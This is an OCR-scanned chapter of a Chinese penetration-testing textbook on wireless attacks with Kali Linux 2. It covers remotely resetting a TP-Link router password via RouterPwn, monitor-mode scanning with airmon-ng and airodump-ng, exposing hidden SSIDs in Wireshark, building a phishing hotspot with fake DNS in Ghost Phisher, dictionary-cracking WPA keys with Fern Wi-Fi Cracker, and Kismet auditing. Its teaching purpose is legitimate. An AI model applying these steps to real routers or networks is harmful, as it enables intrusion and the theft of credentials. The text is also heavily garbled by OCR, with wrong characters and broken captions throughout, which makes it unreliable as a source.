这 4 种 模块 中 要 数 One Click 的 使 用 方法 取 为 简单 ， 无 论 你 使 用 的 是 
哪 一 种 操作 系统 ， 只 要 有 一 个 浏 贤 禹 就 可 以 完成 渗透 过 程 。 


下 面 我 们 就 以 一 台 TP-Link 8840T 路 由 器 为 例 ( 这 是 一 个 2012 年 披 
露 的 漏洞 ， 目 前 的 TP-Link 路 由 器 都 已 经 修补 了 访 漏 洞 ， 这 里 只 是 出 于 
教学 目的 ) TP-Link 8840T 在 实现 上 存在 安全 限制 纸 过 漏 筒 ， 默 认 人 多 
许 WAN 用 户 访 问 设 备 的 管理 员 Web 接 口 ， 攻 击 者 可 利用 此 漏洞 绕 过 某 
些 安全 限制 并 执行 非法 操作 。 利 用 这 个 漏洞 我 们 就 可 以 远程 将 目标 路 由 
稻 的 密码 重 置 为 宇 ， 如 图 14-5 所 示 。 





2014/01/14 One click 1337day.com 


图 14-5 ”密码 重 置 漏洞 模块 
如 图 14-6 所 示 ， 我 们 首先 单 击 这 个 模块 ， 默 认 的 路 由 器 地 址 为 


192.168.1.1. 





图 14-6 2P am R3 E EL ddp] E XA 


"RE HI ERAS AEXXT IUE. o A a MASET IP”， 将 IP 地 址 设 
置 为 目标 地 址 ， 如 图 14-7 所 示 。 


www.routerpwn.com 上 的 网 页 显示 : 











ick JakoblelLcom 


图 14-7 在 密码 重 置 漏洞 模块 中 设置 IP 


接 下 来 这 个 模块 融会 开始 运行 ， 目 动 纸 过 安全 机 制 ， 将 路 由 大 的 管 
HARANT. “One Click” 关 的 命令 虽然 使 用 很 傈 单 ， 但 是 功能 却 十 
分 强大 。 你 可 以 详细 地 参阅 这 里 面 提供 的 漏洞 模块 ， 并 答 试 使 用 这 些 模 
块 来 重 置 目标 路 由 画 的 密 合 ， 获 取 目 标 路 由 需 的 配置 信息 ， 对 目标 路 由 
俐 的 文件 进行 衣 历 ， 其 至 可 以 远程 执行 一 些 命令 。 


14.2 ”如 何 扫 手 出 可 连接 的 无 线 网 络 


在 现代 化 的 网 络 中 ， 网 线 已 经 很 难看 到 了 ， 取 而 代 之 的 古越 来 越 方 
便 的 无 线 网 络 。 目 前 在 很 多 的 单位 中 也 大 都 使 用 了 无 线 网 络 。 因 此 对 这 
种 新 型 的 网 络 进 行 渗透 也 是 我 们 的 工作 。 目 前 用 来 进行 渗透 负 试 的 无 线 
pz DL HUdEAircrack—NG-2 JE. 3X fi — H Thomas d'Otreppe. 
Christophe Devine 共 同 开 用 的 专门 用 来 完成 对 无 线 网 络 进行 监控 、 测 
试 、 攻 击 甚至 渗透 的 工具 。 了 最 新 版 的 Kali Linux 2 将 所 有 的 无 线 渗 透 训 试 
工具 都 放 在 了 分 类 “06- Wireless Attacks” 中 ， 图 14-8 中 融 给 出 了 该 分 类 中 
的 主要 工具 。 


在 这 个 分 类 中 的 第 一 个 工具 就 是 Aircrack- NG， 这 也 可 以 看 出 Kali 
开发 团队 对 这 款 工具 的 喜爱 。 使 用 Kali Linux 2 对 无 线 网 络 进行 渗透 测试 
时 ， 必 须要 注意 一 点 ， 普 通 的 网 卡 不 能 完成 钊 见 的 渗透 任务 ， 你 需要 使 
FH — xX Hel 55 38 xc rKali Linux 2 的 无 线 网 卡 。 不 过 这 一 点 很 容易 办 到 ， 
在 淘宝 上 你 只 需 花 几 十 元 就 可 以 买 到 一 藉 这 样 的 无 线 网 卡 。 
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14-8 *06-Wireless Attacks” 分 类 下 的 主要 工具 


下 面 所 进行 的 测试 都 是 在 VMware 虚 拟 机 中 进行 的 ， 所 以 在 将 无 线 
网 卡 插 入 到 主机 的 USB 接 口 之 后 ， 需 要 在 虚拟 机 中 进行 如 图 14-9 所 示 的 
设置 ， 依次 选中 “可 移动 设备 ”一 你 的 无 线 网 卡 的 名 称 ( 我 这 里 使 用 的 
是 “Ralink802.11 nWLAN") 一 连接 〈 断 开 与 主机 的 连接 ) 。 


加 «i -Linux-2017.1-vm-i686 - 


文件 (F) ”编辑 (E) ”查看 (V) | 虚拟 机 (M) | 选项 不 MT) 帮助 H) | 有 ~ | cB | (9 (95 £9 | BD) x E 
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图 14-9 将 Kali Linux 2 虚拟 机 与 无 线 网 卡 连接 


在 Kali Linux 2 虚拟 机 中 ， 打 开 一 个 终 闹 ， 检 测 这 个 网 卡 古 否 已 经 正 
第 工作 ， 这 里 可 以 使 用 命令 “ifconfig”* 来 查看 网 络 连 接 情 况 ， 如 图 14-10 
所 示 。 


这 时 出 现 的 wlan0 就 是 我 们 刚刚 插入 的 无 线 网 卡 ， 现 在 这 块 网 卡 已 
EE cou) PNIVDRISIENMN 因为 我 们 还 需要 进行 下 一 步 的 
S Jl 。 


: # ifconfig 
eth0: flags-4163«UP,BROADCAST,RUNNING,MULTICAST» mtu 1500 
inet 192.168.1.104 netmask 255.255.255.0 broadcast 192.168.1.255 
inet6 fe80::20c:29ff:fel2:dd23 prefixlen 64 scopeid 0x20<link> 
ether 00:0c:29:12:dd:23 txqueuelen 1000 (Ethernet) 
RX packets 1004 bytes 92345 (90.1 KiB) 
RX errors 0 dropped 0 overruns 0 frame 0 
TX packets 370 bytes 23059 (22.5 KiB) 
TX errors © dropped 0 overruns 0 carrier © collisions 0 
device interrupt 19 base 0x2024 


lo: flags-73«UP,LOOPBACK,RUNNING» mtu 65536 


inet 127.0.0.1 netmask 255.0.0.0 

inet6 ::1 prefixlen 128 scopeid 0x10<host> 

loop txqueuelen 1 (Local Loopback) 

RX packets 24 bytes 1272 (1.2 KiB) 

RX errors 0 dropped 0 overruns 0 frame 0 

TX packets 24 bytes 1272 (1.2 KiB) 

TX errors 0 dropped 0 overruns 0 carrier © collisions 0 


wlan0: flags-4163«UP,BROADCAST,RUNNING,MULTICAST» mtu 1500 
ether 00:0c:43:a5:al:9f txqueuelen 1000 (Ethernet) 
RX packets 0 bytes © (0.0 B) 
RX errors 0 dropped © overruns © frame 0 
TX packets © bytes O (0.0 B) 
TX errors 0 dropped 0 overruns © carrier © collisions 0 





K14-10 ”当前 虚拟 机 的 网 络 连接 情况 
在 终端 中 输入 命令 来 启动 wlan0: 


root@kali: airmon-ng start wlanO 


执行 这 条 命令 之 后 ， 很 快 会 出 现 如 图 14-11 所 示 的 界面 。 


:~# airmon-ng start wlanO 
Found 3 processes that could cause trouble. 
If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to run 'airmon-ng check kill' 
PID Name 
486 NetworkManager 
734 wpa supplicant 
1882 dhclient 
PHY Interface Driver Chipset 


phy2 wWLang rt2800usb Ralink Technology, Corp. RT5370 


图 14-11 开局 monitor 模 式 


这 时 阶 心 等 待 一 小 会 儿 ， 如 果 出 现 了 如 图 14-12 所 示 的 界面 ， 那 么 
恭喜 你 ， 你 的 网 卡 可 以 使 用 了 。 


(mac80211 monitor mode vif enabled for [phy2]wlanO on [phy2]wlanOmon) 





(mac80211 station mode vif disabled for [phy2]wlan0) 





图 14-12” 成功 创建 wlan0mon 接 口 


刚才 的 工作 其 实 将 我 们 的 网 卡 设置 为 监听 模式 ， 而 且 系 统 使 用 我 们 
的 无 线 网 卡 建立 了 一 个 新 的 接口 “wlan0mon”， 在 我 们 接 下 来 的 使 用 中 ， 
都 将 使 用 这 个 接口 。PID 中 列 出 的 是 一 些 可 能 影响 airerack-ng 的 进程 。 


接 下 来 我 们 在 终 靖 中 和 输入 如 下 命令 : 


root@kali:~# airodump-ng wlanemon 


这 时 融会 得 找到 所 有 可 以 连接 的 无 线 网 络 ， 如 图 14-13 所 示 。 如 末 
你 已 经 找到 了 目标 网 络 的 话 ， 可 以 使 用 "Ctrl+C2? 组 合 键 结束 这 个 搜索 。 
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图 14-13 ”使 用 airodump-ng 搜 索 到 的 无 线 网 络 
这 是 一 个 表格 形式 展示 的 无 线 网 络 信息 ， 每 一 列 代 表 的 含义 如 下 : 


BSSID 热点 的 MAC 地 址 
PWR 无 线 的 信号 强度 或 水 平 
Beacons 无 线 发 出 的 通告 编号 


加 密 方 法 ， 包 括 WPA2，WPA，WEP，OPEN 
工作 频道 

使 用 的 认证 协议 

无 线 网 络 名 称 





这 里 如 果 你 发 现 了 使 用 WEP 加 密 模 式 的 无 线 网 络 ， 那 么 这 个 网 络 很 
容易 成 为 黑客 入 侵 的 牺牲 唱 。Kali Linux 的 前 身 BackTrack 系 列 最 初 就 是 
凭借 对 WEP 加 密 的 破解 而 在 国内 普及 的 。 男 外 OPN〈 束 是 open) 的 网 络 
表示 没有 使 用 任何 的 加 密 模 式 ， 校 园 网 里 面 的 无 线 网络 一 般 是 采用 的 这 


种 模式 ， 但 是 连 上 之 后 需要 进行 认证 。 


14.3 EFAA 


RIE EZA PIRE ZEN TREE BUR P ve 90 n] K A A RER, 
这 样 可 以 你 证 我 们 无 线 网 络 的 安全 ， 这 的 确 可 以 提 融 一 点 安全 性 ， 但 十 
我 们 并 不 能 仅 此 束 融 枕 无 忧 。 实 际 上 有 很 多 办 法 可 以 找 出 那些 隐藏 的 热 
扩 ， 这 个 原理 实际 上 是 关闭 了 无 线 信 号 的 SSID 广 播 ， 使 得 无 线 终 剖 无 法 
FITH PAEA H AS HAA R o 


作为 渗透 测试 者 的 我 们 ， 也 有 必要 来 找 出 那些 己 经 被 设置 为 隐藏 的 
热点 ， 如 图 14-14 所 示 。 因 为 这 些 热 点 也 有 可 能 被 黑客 作为 入 侵 的 入 
口 ， 检 测 的 方法 是 要 首先 启动 wlan0mon， 如 图 14-15 所 示 。 


14:32 () ^ ^ 


< ”设置 移动 热点 





网 络 名 柳 hidden 


安全 性 
开放 


隐藏 网 络 o 


取消 保存 


图 14-14 创建 一 个 隐藏 SSID 的 热 反 
实现 这 一 点 除了 需要 airmon-ng 之 外 ， 还 需要 一 个 可 以 解析 数据 包 的 
工具 ， 这 里 面 我 们 选择 Wireshark。 下 面 我 们 启动 这 两 个 工具 ， 注 意 一 点 
这 里 局 动 Wireshark 的 方法 和 平时 不 一 样 ， 这 里 要 使 用 “&”， 命 令 如 下 : 
启动 的 界面 如 图 14-16 所 示 。 


root(Qkali: ~ o oo0 


File Edit View Search Terminal Help 
:-4 airmon-ng start wlanO 


Found 3 processes that could cause trouble. 
If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to run 'airmon-ng check kill' 


PID Name 
453 NetworkManager 
699 wpa supplicant 


700 dhclient 
Interface Driver Chipset 
wlan0 rt2800usb Ralink Technology, Corp. RT5370 
(mac80211 monitor mode vif enabled for [phy8]wlanO on [phyO]wlan 


(mac80211 station mode vif disabled for [phy0]wlan0) 





图 14-15  JHzjjwlanümon 


图 14-16 ”局 动 Wireshark 


这 里 选择 使 用 wlan0mon 作 为 监听 的 网 卡 ， 如 图 14-17 上 所 示 。 


The Wireshark Network Analyzer ooo 
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Loopback: lo — 
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User's Guide - Wiki - Questions and Answers : Mailing Lists| 


Ynn are riinnin a Wirechark ? ? R [Git Rev | Inkneoewn fram inknmnwny 


图 14-17 Wireshark 的 工作 界面 


然后 单 击 局 动 ， 也 束 是 那个 获 鱼 鱼 标 志 的 按钮 ， 很 快 融 可 以 捕获 到 
大 量 的 Wi-Fi 数 据 包 ， 如 网 14-18 所 示 。 





Capturing from wlan0mon o o o 
File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 


EH (co D X óO«-ue«€»».J2t*€»-—Ezasa atf 











(A [Apply a display filter ... «Ctrl-/» ca- -| Expression.. + 
No. i. Source Destination Protocol Length Info 人 
aL , 00 :8 SBudB STU :| ob? 8 
: il. 244008473 SonyMobi 5b:08:5a Broadcast 802.11 172 Probe Re 
311.245441845  SonyMobi 5b:08:5a Broadcast 802.11 167 Probe Re 
4 11.246877338  SonyMobi 5b:08:5a Broadcast 802.11 161 Probe Re 
511.264949604 $SonyMobi 5b:08:5a Broadcast 802.11 172 Probe Re 
6 11.268734599 SonyMobi 5b:08:5a Broadcast 802.11 167 Probe Re 
7 11.270447937  SonyMobi, 5b:08:5a Broadcast 802.11 161 Probe Re 
8 11.276402169 Tp-LinkT. c9:60:ce (.. 802.11 28 Acknowle 
9 11.346486704 Tp-LinkT c9:60:ce (.. 802.11 28 Acknowle 
10 11.368876463 Tp-LinkT c9:60:ce (.. 802.11 28 Acknowle 
1114.410609932  Guangdon dd:2d:db Broadcast 802.11 107 Probe Re 
12 21.422756262  SonyMobi 5b:08:5a Broadcast 802.11 172 Probe Re 


1 


» Frame 1: 28 bytes on wire (224 bits), 28 bytes captured (224 bits) on interface O 
> Radiotap Header vO, ER 18 

» 802.11 radio informati 

» IEEE 802.11 人 Etage oo 


J000 00 00 12 00 2e 48 00 00 00 02 99 09 a0 00 a7 O1 ..... [lo aus nn 
0010 00 00 d4 00 00 00 7a d3 8d b6 d831 . | |  J  ...... Za au 


© 7  wlanOmon: «live capture in progress» Packets: 19 - Displayed: 19 (100.0%) Profile: Default 


图 14-18 ”Wireshatk 捕 获 到 的 数据 包 


仔细 观察 上 面 捕 获 数 据 包 的 “Destination” 一 列 的 值 ， 这 里 面 有 一 部 
^ od TJ*Destination"[B 7JBroadcast, XKR Hb Xi Sb fe — 1 Es Jk 
的 热点 ， 如 图 14-19 所 示 。 
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14-19 “Destination” 列 的 值 


如 果 一 个 客户 问 去 连接 这 个 隐 首 的 热点 的 时 候 ， 束 会 及 大 “Probe 
Reoues” 类 型 的 数据 包 我 们 只 lpia ain (Destination) 7j 


Broadcast, } H 7j*Probe Request" I] Zi 45 L i n] ER BIRI SSID dA TR e 
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al ws Ju d 9; (^ UR 
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„ 107 Probe Request, SN-21222, FN-0, Flags-........, SSID-Broadcast 
28 Acknowledgement, Flags-........ = 
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图 14-20 ”数据 包 的 详细 信息 


注意 观察 这 个 数据 包 ， 它 的 目的 地 址 (Destination) 为 Broadcast， 
并 且 为 Probe Request” 的 类 型 。 在 最 后 的 Info 列 ， 我 们 可 以 看 到 这 个 
SSID 的 值 为 “hidden”。 es RN 有 了 这 
个 名 称 束 可 以 像 连 接 其 他 热点 一 样 地 连接 到 这 个 看 不 见 的 热点 了 。 


14.4 ”制作 一 个 钓鱼 热点 


“不 要 去 连接 来 历 不 明 的 热点 ”这 人 句 话 应 该 是 这 两 年 最 热门 的 网 络 安 
全 有 用语， 很 多 人 可 能 并 不 知道 如 果 连 接 了 那些 恶意 热点 的 后 果 。 那 么 现 
在 我 们 就 来 构造 一 个 恶意 热点 ， 看 看 如 何 利 用 这 个 热点 对 无 线 设 备 进 行 
渗透 。 很 多 软件 都 可 以 让 我 们 的 无 线 网 卡 成 为 一 个 热点 ， 这 里 面 我 们 
以 “Ghost Phisher 为 例 来 演示 这 次 渗透 过 程 。 


Ghost Phisher 是 一 蒜 支 持 有 线 网 络 和 无 线 网 络 的 安全 审计 工具 。 叱 
通过 伪造 服务 的 方式 ， 来 收集 网 络 中 的 有 用 信息 。 它 不 仅 可 以 伪造 
AP， 还 可 以 伪造 DNS 服务 、DHCP 服 务 、HTTP 服 务 。 同 时 ， 它 还 可 以 
构建 陷阱 ， 进 行 会 话 劫持 、ARP 攻 击 ， 最 后 还 可 以 收集 各 种 登录 信息 。 
这 个 工具 使 用 Python 编号， 并 提供 界面 操作 ， 上 所 以 使 用 起 来 非常 方便 ， 
如 图 14-21 所 示 。 


Ghost Phisher 


V1.64 


Access Point Details 


Wireless Interface 


Status 








图 14-21 Ghost Phisher 的 工作 界面 


首先 来 设置 用 来 伪造 热点 的 所 用 的 网 卡 ， 单 击 右 侧 的 “Refresh Card 
List”， 然 后 单 击 下 方 的 “Set Monitor”， 如 图 14-22 上 所 示 。 








图 14-22 ”设置 Ghost Phisher 使 用 的 网 卡 


这 次 使 用 wlan0 作 为 伪造 热点 所 使 用 的 网 卡 ， 接 下 来 对 热点 的 各 种 
属性 进行 设置 ， 这 些 属 性 包括 SSID、 加 密 方式 等 ， 如 图 14-23 所 示 。 











Status 


图 14-23 ”设置 伪造 热点 的 各 种 属性 


建立 好 了 热点 之 后 ， 下 一 步 陨 可 以 构造 虚假 的 DNS 服务 项 、HTTP 
服务 占 、DHCP 服 务 硕 ， 以 此 来 渗透 接 入 的 设备 。 同 时 也 可 以 对 连 入 热 
点 的 设备 进行 会 话 劫持 、ARP 毒 化 等 攻击 ， 如 图 14-24 上 所 示 。 





Ghost Phisher £e 

















Connections: 


图 14-24 ”伪造 DNS 服务 器 的 设置 界面 


在 这 个 腹面 中 我 们 可 以 选择 为 热点 指定 一 个 DNS 服务 磺 地 址 ， 这 样 
连 入 热 扣 所 有 设备 的 DNS 请 求 融 都 会 及 达到 这 个 DNS 服务 规 。 万 外 我 们 
也 可 以 选择 只 伪造 一 条 DNS 解析 记录 ， 在 上 面 方 框 中 添加 对 应 的 内 容 了 束 
可 以 完成 这 个 任务 。 


14.5 ”破解 Wi-Ei 的 密码 


第 见 的 无 线 网 络 剖 是 使 用 密码 进行 验证 的 ， 只 有 输入 正确 的 密码 才 

EE 连接 到 目标 网 络 。 有 时 我 们 渗透 测试 的 目标 采用 的 就 是 加 密 的 无 线 网 

^ 目前 常见 的 加 密 方 式 为 WEP、WPA 和 WPA2 等 ， 但 是 WEP 的 安全 性 
较 甜 ， 已 经 逐渐 被 淘汰 。 大 多 数 无 线 网 络 加 冤 方 式 采 用 了 WPA 和 
WPA2， 例 如 图 14-25 中 右 侧 有 一 个 锁 标 志 的 就 都 是 加 密 了 的 网 络 。 
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图 14-25 附近 的 无 线 网 络 


如 果 没 有 密码 的 话 ， 我 们 无 法 进入 到 这 些 加 密 网 络 。 那 么 是 否 有 办 
法 获得 这 些 密码 昵 ? Kali Linux 2 中 提供 了 一 学 专门 用 于 破解 Wi FX RS 
的 工具 ， 其 中 这 里 面 最 为 有 效 的 束 是 Fern Wi-Fi Cracker. 3X LR. n] Ul 


破解 使 用 WEP 和 WPA 加 密 模 式 的 密码 ， 但 是 需要 注意 的 是 ， TRREWPA 


密码 并 不 像 WEP 密 码 那 么 容易 。 好 了 ， 


14-26 所 示 。 


Favorites 

01 - Information Gathering 
02 - Vulnerability Analysis 

03 - Web Application Analysis 
04 - Database Assessment 
05 - Password Attacks 

06 - Wireless Attacks 

07 - Reverse Engineering 
08 - Exploitation Tools 

09 - Sniffing & Spoofing 

10 - Post Exploitation 
11 - Forensics 
12 - Reporting Tools 
13 - Social Engineering Tools 
14 - System Services 


Usual applications 


图 14-26 
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Æ Kali Linux 2 中 启动 Fern Wi-Fi Cracker 


Fern Wi-Fi Cracker 局 动 之 后 的 工作 界面 如 图 14-27 所 示 。 

















| 
Fern WIFI Cracker £3 
Select Interface v A Refresh 
| mu « 
Selec erface card 
(9) Scan for Access points 
Cr) 
Fern WIFI Cracker 2.5 U yj r1 | 
New Update is Available 
E 3 
I J| KeyDataba No Key Entrie 
" 3 
| 2 
Python Version: 2.7.13 defaul 
A k Version: Aircrack-ng 1.2 rc4 - 
Qt Version: 4.11.4 








图 14-27 Fern Wi-Fi Cracker 的 工作 界面 


H, wB 


首先 要 选择 用 来 连接 无 线 网 络 的 网 卡 ， 单 击 右上 方 的 “Select 
Interface” 下 拉 列 表 框 ， 这 里 面 我 们 选择 “wlan0”， 如 图 14-28 所 示 。 
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| r^ Refresh | 
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(() Scan for Access points 


图 14-28 ”网 卡 下 拉 列 表 框 


然后 单 击 下 面 那 个 天 线 图 标的 按钮 ， 这 个 按钮 的 作用 是 扫描 范围 内 
的 热点 ， 单 击 之 后 这 个 按钮 右 侧 的 文字 就 会 显示 为 绿色 的 Active， 下 方 
对 应 的 WEP 和 WPA 右 侧 红 色 的 数字 表示 找到 的 对 应 这 种 加 密 方式 的 热 
点 ， 如 图 14-29 所 示 。 
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Fi WPA 25 Detected 





图 14-29 ”扫描 到 了 25 个 以 WPA 作 为 加 密 模 式 的 热点 


当 扫 描 完 成 之 后 ， 单 击 Wi-Fi 按 钮 就 可 以 进入 到 攻击 设置 界面 了 ， 
如 图 14-30 所 示 。 





Attack Panel e 
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图 14-30 ”攻击 设置 界面 


Fern Wi-Fi Cracker 提 供 了 两 种 破解 目标 网 络 的 方式 ， 一 种 是 第 规 密 
但 破解 ， 另 一 种 是 利用 WPS 的 漏 铜 进行 攻击 ， 但 后 者 需要 目标 网 络 开局 
WPS。 这 里 我 们 选择 使 用 稼 规 密 但 人 破解 方式 ， 在 这 个 界面 中 选择 其 中 一 
个 AP 进行 测试 ， 例 如 TP-LINK_2AA6， 首 先 在 Attack Option 单 选 框 中 选 
择 “Regular Attack”， 然 后 在 右 下 角 “Browse” 处 选择 要 使 用 的 字典 文件 。 
最 后 单 击 上 方 右 侧 的 Attack 按 钮 开始 攻击 。 但 是 这 种 攻击 需要 捕获 客户 
闹 和 热点 之 加 的 通信 ， 两 者 之 间 的 通信 越 频 或， 破解 的 概率 整 越 珊 。 如 
条 当 前 没有 和 连接， 此 时 会 弹出 一 个 警 香 框 ， 告 诉 我 们 目前 没有 客户 妆 连 
接 ， 因 此 无 法 进行 密码 破解 。 单 击 “handshake Status” 后 面 的 下 拉 列 表 框 
可 以 看 到 与 当前 热点 连接 的 客户 六 。 


当 一 切 设 置 完毕 之 后 ， 束 可 以 开始 冤 码 的 破解 了 ， 和 破解 的 进度 可 以 
在 界面 下 方 的 进 上 度 条 处 看 到 。 成 功 地 破解 之 后 ， 我 们 可 以 返回 到 主 界 面 
选择 “Key Database” 来 得 看 破解 的 密码 。 和 破解 的 密码 都 被 保存 在 这 个 小 
型 数据 库 中 ， 如 图 14-31 所 示 。 


ft Fern Wi-Fi Cracker 中 还 提供 了 一 些小 工具 ， 这 个 工具 箱 的 界面 如 
图 14-32 所 示 O 





图 14-31 ”密码 数据 库 





图 14-32 Ferm Wi-Fi Cracker 中 的 小 工具 


14.6 ”使 用 Kismet 进 行 网 络 审 计 


Kismet zé — 3X LfF4E 802.11 协议 第 二 层 的 无 线 网 络 检测 RIRS 
于 扰 工 具 。 它 可 以 工作 在 文 持 raw 监 探 模式 的 所 有 无 线 网 卡 上 上， 可 以 距 
探 包括 802.11b、802.11a 和 802.11g 在 内 的 协议 包 。 如 图 14-33 所 示 ， 
Kismet 位 于 Kali Linux 2 系统 中 的 第 6 个 分 类 wireless attacks 中 ， 也 可 以 打 
开 一 个 终 疹 ， 然 后 在 里 面 输入 “Kismet” 来 局 动 这 个 程序 。 
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K|14-33 ”在 Applications 中 局 动 Kismet 


局 动 之 后 的 Kismet 界 面 如 图 14-34 所 示 。 


root(Qkali: ~ 
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Some terminals don't display some colors (notably, dark grey) 
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No 
0 Is it visible? If you answer 'No', dark grey 
will not be used in the default color scheme. Remember, you 
can always change colors to your taste by going to 
Kismet-»Preferences-»Colors. 


[ No ] [ Yes ] 


Data 
(Connection refused) will attempt to reconnect in 5 seconds. 
ERROREAK SIT MET CT i S EST ET Ta 7M To ODE EUST: 
(Connection refused) will attempt to reconnect in 5 seconds. 
EN: Could not connect to Kismet server 'localhost:2501' 
(Connection refused) will attempt to reconnect in 5 seconds. 





图 14-34 Kismet M 


在 弹出 的 “Kismet is running as root" ZR] HP 3H "OK" FEH, An d14- 
35 所 示 。 





图 14-35 “Kismet is running as root" 7 [H] 
AN Jc ETE Yes KEAN us. "UÉ14-36B Tn - 


在 接 下 来 的 “Start Kismet Server" 里 保存 默认 设置 即 可 ， 单 
击 “Start” 按 钮 ， 如 图 14-37 所 示 。 


[ Yes ] 





14-36 “Start Kismet Server" 7; [ft] 


[ Start ] 





图 14-37 JS ws V ER IBI 
在 是 否 添加 网 卡 界面 中 选择 “Yes” 按 钮 即 可 ， 如 图 14-38 所 示 。 
添加 网 卡 的 详细 信息 ， 在 Intf 中 ， 输 入 无 线 网 卡 接 口 。 如 果 无 线 网 


卡 已 处 于 监 昕 模式 ， 可 以 输入 wlan0 或 mon0。 其 他 信息 可 以 不 添 加 。 然 
后 单 击 “Add 按 钮 ， 如 图 14-39 所 示 。 


[ Yes ] 





图 14-38 ÆRA NRA IG 


[ Add ] 





图 14-39 网 卡 的 详细 信息 
添加 完 网 卡 信息 之 后 ， 就 会 显示 如 图 14-40 所 示 的 扫描 信息 。 


在 该 界面 选择 “close console window” 按 钮 ， 就 可 以 显示 如 图 14-41 所 
示 的 图 形 化 界面 。 


root(Qkali: ~ ooo 
File Edit View Search Terminal Help 


encryption no, channel 6, 54.00 mbit 
: Detected new managed network "TP-LINK 96FC", BSSID D8:15:0D:7D:96:FC, 
encryption yes, channel 6, 450.00 mbit 
: Detected new managed network "666", BSSID 34:96:72:52:C3:8B, 
encryption yes, channel 6, 450.00 mbit 
: Detected new managed network "TP-LINK 4938", BSSID BO:95:8E:3C:49:38, 
encryption yes, channel 6, 450.00 mbit 
: Detected new managed network "«Hidden SSID»", BSSID 00:1F:6F:36:DC:8D 
, encryption yes, channel 6, 54.00 mbit 
: Detected new managed network "ChinaNet-vhrW", BSSID 68:8A:F0:C9:C8:58 
, encryption yes, channel 6, 144.40 mbit 
: Detected new managed network "dlink", BSSID C8:BE:19:AB:46:BA, 
encryption yes, channel 10, 300.00 mbit 
: Detected new managed network "TP-LINK 60CE", BSSID EC:26:CA:C9:60:CE, 
encryption yes, channel 11, 450.00 mbit 
: Detected new managed network "ZHAOJI", BSSID A8:57:4E:C3:53:2A, 
encryption yes, channel 11, 450.00 mbit 
: Detected new probe network "«Any»", BSSID DA:A1:19:66:E7:42, 
encryption no, channel 0, 54.00 mbit 
: Detected new managed network "Tenda 457C10", BSSID C8:3A:35:45:7C:10, 
encryption yes, channel 2, 300.00 mbit 





图 14-40” 扫 搬 到 的 信息 


root@kali: ~ o o o0 
File Edit View Search Terminal Help 
Kismet Sort View Windows 


Networks 
28 


Packets Packets 
1008 


Pkt/Sec 
0 


Filtered 
0 
Data 
: Saved data files 
: Detected new managed network "TP-LINK 2AA6", BSSID BC:46: 
99:8E:2A:A6, encryption yes, channel 1, 450.00 mbit 
: Detected new probe network "«Any»", BSSID DA:A1:19:23:32: 
86, encryption no, channel 0, 150.00 mbit 





图 14-41 图形 化 界面 


该 图 形 化 界面 显示 的 人 信息， 就 是 正在 串 探 该 无 线 网 络 中 的 信号 。 在 
大 上 角 显示 了 嗅 探 到 的 网 络 中 的 数据 外 信息 ， 中 向 的 图 显示 嗅 探 到 的 网 
络 流量 ， 模 线 上 方 的 柱 形 表示 数据 包 ， 模 线 下 方 的 柱 形 表示 数据 。 我 们 
也 可 以 使 用 上 方 某 单 栏 中 的 Sort 按 钮 进行 排序 ， 使 用 view 按 钮 来 选择 显 
示 的 数据 。 当 运行 一 定时 间 后 ， 停 止 修改 。 在 该 界面 单 击 Kismet 菜 单 选 
项 并 选择 Quit 命 令 ， 如 图 14-42 上 所 示 。 


时 ， 


root@kali: ~ o o Q 


File Edit View Search Terminal Help 
Sort View Windows 


Server Console... 


Disconnect 


3l 


Add Source... 


27 Config Channel... 


Plugins 


Preferences 


0 Quit 


BB, 


0 


Networks 


Packets 
1527 


Pkt/Sec 


Filtered 


0 
Data 


encryption no, channel 0, 144.40 mbit 


: Detected new managed network "Tenda 33DA88", BSSID C8:3A: 
35:33:DA:88, encryption yes, channel 9, 300.00 mbit 

: Detected new data network "«Unknown»", BSSID 84:C9:B2:2F: 
8C:6B, 


encryption yes, channel 0, 0.00 mbit 


图 14-42 Kismetll] Fdy3E 
按 下 Quit 命 令 后 ， 将 显示 如 图 14-43 所 示 的 界面 。 


[ Kill ] 








14-43 “Stop Kismet Server" Zr H 


e 界面 单 击 “Kill* 按 钮 ， 将 停止 Kismet 服 务 并 退出 终端 模式 。 此 
端 将 会 显示 一 些 日 志 信息 ， 如 图 14-44 所 示 。 


root@kali: ~ o o0 


File Edit View Search Terminal Help 
:~# kismet 


*** KISMET CLIENT IS SHUTTING DOWN *** 


[SERVER] 
[SERVER] 
[SERVER] 
[SERVER] 
[SERVER] 


SERVER] 


[ 
d. 
[ 


SERVER] 
[SERVER] 
[SERVER] 
[SERVER] 
[SERVER] 
[SERVER] 


可 使 用 ls 命令 查看 以 上 生成 的 日 志文 件 。 执 行 合 


INFO: 


Stopped source 'wlanO' 


ERROR: TCP server client read() ended for 127.0.0.1 


*** KISMET IS SHUTTING DOWN *** 
Closed pcapdump log file 'Kismet-20171003-21-11-56-1.pcapdump', 2 


INFO: 


INFO: 
INFO: 
INFO: 
INFO: 


INFO: 


logged. 


Closed netxml log file 'Kismet-20171003-21-11-56-1.netxml', 


logged. 


Closed nettxt log file 'Kismet-20171003-21-11-56-1.nettxt', 


logged. 


Closed gpsxml log file 'Kismet-20171003-21-11-56-1.gpsxml', 


Closed alert log file 'Kismet-20171003-21-11-56-1.alert', 


Shutting down plugins.. 


Shutting down log files. 
WARNING: Kismet changes the configuration of network devices. 


In most cases you will need to restart networking for 
your interface (varies per distribution/0S, but 
usually: /etc/init.d/networking restart 


Kl14-A4 ” ”Kismet 的 日 志 信 息 


26 
26 
0 log 


2 logge 
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图 14-45 ”使 用 ]s 命 令 查 看 生成 的 日 志文 件 


可 以 看 到，Kismet 一 共 输 出 了 5 个 日 志文 件 ， 这 些 文件 中 你 存 了 生 
成 的 所 有 信息 ， 这 些 文件 有 看 个 同 的 属性 ， 这 一 点 从 后 级 名 可 以 看 出 
来 。 这 5 种 文件 的 台 义 具体 如 下 : 


alert: 所 有 的 敬告 信息 都 保存 在 这 个 文件 中 。 

gpsxml: 所 有 的 GPS 数据 都 保存 在 这 个 文件 中 。 

nettxt: 所 有 的 文本 输出 信息 都 保存 在 这 个 文件 中 。 
netxml: 所 有 的 XML 格 却 的 数据 都 保存 在 这 个 文件 中 。 
pcapdump: 人 整个 会 话 捕获 的 数据 包 都 保存 在 这 个 文件 中 。 


如 果 你 希望 对 这 些 流量 数据 进行 进一步 的 分 析 的 话 ， 可 以 使 用 
WireShark 打 开 pcapdump 文 件 ， 在 Wireshatrk 中 可 以 详细 地 查看 这 些 流量 
的 内 容 。 


14.7 小 结 

